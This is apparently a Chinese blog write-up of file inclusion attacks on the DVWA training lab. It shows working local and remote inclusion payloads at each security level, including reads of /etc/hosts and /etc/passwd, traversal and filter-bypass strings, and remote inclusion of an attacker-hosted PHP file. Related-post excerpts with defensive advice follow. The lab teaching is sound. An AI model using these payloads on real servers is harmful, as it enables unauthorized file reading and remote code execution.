dvwa中的文件包含攻击

最新推荐文章于 2025-04-07 23:15:21 发布
最新推荐文章于 2025-04-07 23:15:21 发布
阅读量1.9k 收藏 14
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: 文件包含攻击 File Inclusion
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leiwuhen92/article/details/128711912
文章详细介绍了文件包含漏洞的概念,特别关注PHP中的文件包含函数,如require()和include()。通过DVWA平台的不同安全级别(Low,Medium,High,Impossible)展示了文件包含漏洞的利用方式,包括本地文件包含和远程文件包含,以及如何通过修改URL参数绕过防护措施执行恶意代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境:

dvwa: 192.168.11.135 dvwa版本 Version 1.9 (Release date: 2015-09-19)

kail机器:192.168.11.156

一、什么是文件包含漏洞?

为简化代码,会把重复的code内容单独写到一个页面文件,然后再需要调用重复内容的页面中使用include方法来包含重复代码的页面就可以了。

使用include方法可以让当前页面去执行指定的另外一个文件中的代码内容。若没有对这种行为做限制,那么黑客将很有可能让当前页面去执行超出 Web 目录中的文件或者是 Web 目录中不希望被执行的敏感文件,甚至是远程服务器上的文件。比如黑客使用 include 方法去调用 Linux 系统中的 /etc/passwd,就会在当前页面中显示系统中的用户信息;或者黑客自己搭建 Web 服务器,在自己的服务器上写一个 Webshell,然后通过 include 方法在目标页面中执行本地服务器中的 Webshell。

几乎所有的脚本语言中都提供文件包含的功能,但文件包含漏洞在php中居多,而在jsp\ASP\ASP.NETC程序中非常少,甚至没有文件包含漏洞的存在。

原理服务器解析执行php文件时能通过包含函数加载另外一个文件中的php代码,当被包含的文件中存在木马时,木马程序会在服务器上加载执行

下面介绍php的四种文件包含函数

  • require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本

  • require_once():功能与requir()相同区别在于当重复调用一个文件时,程序只调用一次

  • include():执行到include()函数时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行

  • include_once():功能和includ()相同,区别当重复调用一个文件时,程序只调用一次

  • nighcight_file(),show_source()函数对文件进行语法高亮显示,通常能看到源代码

  • readfile(),file_get_contents()函数读取一个文件,并写入输出缓冲

  • fopen(),打开一个文件或者url

文件包含漏洞包括本地文件包含漏洞和远程文件包含漏洞:

  • 本地文件包含漏洞指的是包含本地的php文件;

  • 远程文件包含漏洞包含的是其它服务器上的php文件。需要满足两个条件在php.ini中。当php.ini中的配置选项allow_url_fopen:on allow_url_include:on,对方开启这两个配置时才可以使用

dvwa: 192.168.11.135 环境开启了:

二、演示dvwa上的文件包含漏洞

2.1、low级别

源码

1、安全级别设置为Low,点击 File Inclusion 按钮,进入文件包含攻击页面。页面中有 3 个文件链接:

点击后会读取出系统的相关信息,说明这 3 个文件内含有读取相关系统信息的脚本代码,被包含进当前页面执行了。

当前的 URL 显示了 http://192.168.11.135:81/vulnerabilities/fi/?page=后就是被包含的文件名 file3.php。

2、考虑到我们当前 Web 服务器(dvwa)是使用的 docker容器(Linux),把 URL 中的文件名替换为 /etc/hosts,发现可以通过绝对路径直接显示 hosts 文件中的内容:

3、使用相对路径 ../../phpinfo.php 来替换 URL 中的包含文件名,可以执行 DVWA 程序自带的 phpinfo 信息。当前目录是vulnerabilities/fi/,向上返回2层,就到了 /,所以 ../../phpinfo.php就是指 /phpinfo.php 这个文件

4、在kali攻击机上自行搭建一个 Web 服务(sudo service apache2 start),在 Web 根目录/var/www/html下写入一个 shell.php 文件(内容:<?php phpinfo();?>),用来显示 PHPINFO:

使用http://192.168.11.156/shell.php来替换原 URL 中包含的文件名,可以远程执行 PHP 脚本

2.2、medium级别

1、安全级别设置为 Medium,进入文件包含攻击页面,查看源码:

发现使用 str_replace() 函数把 http://、https://、../、..\ 替换为了空值,来防止远程文件包含和相对路径的文件包含。但是str_replace() 函数相当不安全,只做一次替换,比如在 http:// 中再嵌套一个 http:// 则可以绕过限制;另外,并没有对绝对路径的文件包含进行防护。

2、绝对路径与相对路径的文件包含攻击

使用绝对路径 /etc/hosts 的文件包含,不受任何影响:

使用相对路径 ../../phpinfo.php 进行文件包含不被允许:

使用相对路径进行文件包含不被允许,但可以通过在../中多嵌套一个../绕过,在 URL 中输入包含的文件名为..././..././phpinfo.php,可以成功执行:

3、使用远程文件包含,需要在 http:// 中多嵌套一个 http://,在 URL 中输入包含的文件名为htthttp://p://192.168.11.156/shell.php,可以成功执行

2.3、High级别

1、安全级别设置为 High,进入文件包含攻击页面,查看源码:

发现使用 fnmatch() 函数来检查变量 page 值的开头必须是 file或者file是include.php文件,否则就不执行。

2、可以利用 file 协议来绕过防御。使用 file 协议可以来描述一个文件的绝对路径。我们这里在 URL 中输入包含的文件名为file:///etc/hosts,可以成功输出文件内容

2.4、Impossible级别

1、安全级别设置为 Impossible,进入文件包含攻击页面,查看源码:

发现使用了白名单机制,提交的page 变量只能是include.php、file1.php,file2.php,file3.php这四个文件,否则就不执行,彻底杜绝了文件包含漏洞。

DVWA——文件包含
m0_74426634的博客
04-06 2361
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
DVWA-文件包含
STTTM的博客
12-21 2397
  什么是文件包含?在文件包含里面,我们要想方设法把真正包含的文件掉包,换成恶意文件,服务器却不知道。 文件包含:是一种代码处理方式,当一个代码文件想要引用另外一个代码文件,就要用到包含,常见的包含函数有include、require等,参数是文件名。但是如果文件包含的参数用户可控且过滤不严,被攻击者偷梁换柱。 LOW等级: 首先进行正常的操作:点击fil1和file2时,仅仅是配...
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 3339
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP的文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
dvwa篇之文件包含漏洞低、中、高三个级别的演示(小白必备!!!)
最新发布
qq_61426144的博客
04-07 972
简介:文件包含其初衷是应用于在后端脚本中把一些重复的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次进行编写,这种调用文件的过程一般被称为文件包含,其本身并没有什么危害,但是如果对包含的参数可控,那么在这一过程中就会产生文件包含漏洞,而文件包含又分为本地文件包含和远程文件包含
DVWA全系列-文件包含
leriger的博客
09-24 2187
文件包含漏洞属于漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。几乎所有脚本语言都会提供文件包含的功能。文件包含的原理PHP中提供了四个文件包含的函数,分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含,但作用并不一样。require:找不到被包含的文件时会产生致命错误,并停止脚本。
DVWA 文件包含
m0_56107268的博客
04-30 371
Low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 没有做任何的现在,可以直接进行文件包含 本地包含: 远程服务器包含 : Medium <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "...
DVWA平台文件包含漏洞实验
KUKULI233的博客
05-28 798
一、概念 包含就是浏览,但是不同的是遇见可执行语句将执行 漏洞成因是因为开发人员为使代码更灵活,将文件设为变量,调用的时候未做过滤处理,就可以包含恶意文件 是PHP语言的漏洞,实验需要先配好php服务环境,此处在win7上开启phpstudy Require:找不到被包含的文件会报错并停止 Include:报错,继续执行 _once :调用重复文件时只执行一次 url特征: ?page ?file ?home 目录遍历可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格 文件包含是利用函数包含
Dvwa文件包含全级别学习笔记
Mbys_Lettuce的博客
10-21 1060
文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
DVWA文件包含漏洞(File Inclusion
qq_54537919的博客
06-27 1242
DVWA文件包含漏洞(File Inclusion
DVWA的压缩文件安装包下载
09-30
了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话管理**:DVWA的"Authentication"和"Session Management"部分涵盖了弱密码策略、会话固定和会话劫持等问题。学习正确的身份验证和会话管理实践能...
【渗透测试-web安全】DVWA-文件包含
harry_c的博客
11-11 1333
【渗透测试-web安全】DVWA-文件包含基本概念基本配置等级选择进入界面文件配置重启服务漏洞利用进阶内容基本的构建思路服务端会过滤掉对应的字符信息防范 基本概念 其实之前的文章说过,文件包含是一种代码的处理方法,比如函数include、require等,参数是文件名 但是如果对应的参数能够被用户可控的话,黑客就能够利用,构造出危害系统的缺口。 基本配置 等级选择 首选选择DVWA的等级为Low ...
4、DVWA——文件包含
qq_55202378的博客
08-31 1752
DVWA 文件包含
DVWA文件包含
qq_62078839的博客
04-11 699
首先我们打开kali的apache服务,以此验证远程文件包含 后面都用index.html来验证远程文件包含 low 本地包含 直接调用dvwa文件目录下自带的phpinfo.php 可以用绝对路径来读 也可以构造相对路径来读 远程包含 可以直接读取其下的index.html 源码 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 并未做任何过滤 me...
DVWA-文件包含漏洞
热门推荐
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
DVWA篇_文件包含
06-01 432
这里以Apache为例,每次成功访问的记录都会记录在access.log下,访问失败的记录会记录在error.log下。使用fnmatch函数匹配以file开头的文件,我们可以使用file://伪协议绕过。对http(s)://、../、..\\进行了过滤,可以双写关键字来绕过。首先在文件上传处上传有写功能的木马,.txt或者.php都可以。将http://=>hthttp://tp://便可绕过。这时再查看日志文件,发现恶意代码成功被写入日志文件中。这时使用文件包含漏洞,目录遍历去包含日志文件。
DVWA文件包含
weixin_46429206的博客
12-03 3189
Windows 本地文件包含 低 查看源码 不存在过滤,可直接读取或执行文件内容 中 源码中存在一些过滤规则,我们只需要进行复写或者大小写转换即可绕过 1、使用绝对路径 2、使用相对路径复写或者是大小写绕过 高 要求文件变量以file开头,因此远程文件包含失效,只能使用本地文件包含,且需要用到file协议 Linux 低 中 因为源码里过滤的是http和https,因此不影响我们使用相对路径和绝对路径 远程文件包含 低 Shell.php内容 攻击者访问受害者shell.php文件
DVWA文件包含File Inclusion
qq_39682037的博客
03-21 2583
文件包含File Inclusion) 指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是...
dvwa文件包含漏洞
01-07
### DVWA 文件包含漏洞 #### 漏洞利用原理 DVWA (Damn Vulnerable Web Application) 是一款用于安全测试的学习平台,其中包含了多种常见的Web应用漏洞。文件包含漏洞允许攻击者通过操纵URL参数来读取或执行服务器上的任意文件。这种类型的漏洞可以分为本地文件包含(LFI)和远程文件包含(RFI)。当应用程序使用用户输入作为文件路径的一部分而不做适当验证时就会发生此类问题。 在DVWA环境中设置低安全性级别下,可以通过修改`fileinclude.php`页面中的`page`参数来进行文件包含攻击尝试。例如,在浏览器地址栏中输入如下链接: ``` http://<your-ip>/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd ``` 这将试图访问Linux系统的密码文件 `/etc/passwd` 并将其内容显示给用户[^2]。 #### 解决方案与防御措施 为了防止文件包含漏洞的发生,应该采取以下几种方法之一或多者的组合策略: - **白名单验证**: 对于任何可能被用来指定要加载资源位置的数据项都应实施严格的白名单过滤机制。只允许特定目录内的文件名,并且不允许有特殊字符存在。 - **移除危险函数**: 如果不需要动态加载PHP脚本,则可以从代码库中删除 `include()`, `require()` 及其变体等潜在风险较高的内置功能调用。 - **禁用远程文件包含支持**: PHP配置选项 `allow_url_include` 应该始终设为关闭状态 (`Off`) 来阻止恶意网站提供的外部资源被执行的可能性。 - **最小权限原则**: 运行Web服务进程所使用的操作系统账户应当具有尽可能少的操作权利;即使成功实现了非法文件的引入也无法造成更大损害。 ```php // 示例:检查并净化传入的 page 参数 $allowed_pages = ['home', 'about', 'contact']; if (!in_array($_GET['page'], $allowed_pages)) { die('Invalid request.'); } $page = $_GET['page'] . '.php'; include($page); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值